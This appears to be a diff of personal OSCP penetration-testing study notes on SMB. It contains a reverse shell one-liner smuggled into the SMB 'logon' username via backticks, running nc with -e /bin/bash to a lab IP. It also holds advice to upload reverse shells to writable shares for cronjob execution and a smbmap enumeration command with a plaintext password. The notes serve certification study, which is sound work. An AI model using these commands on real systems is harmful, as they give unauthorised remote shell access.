generalVader01/nextGenCoding/OSCP/OSCP_Notes.md

 #smb reverse shell with "logon" cmd
 logon "/=`nc 10.10.14.5 4444 -e /bin/bash`"

+# General SMB Tips
+	If you find a writable folder, upload reverse shells to it.
+It might get executed by a cronjob

 # smbmap
 smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum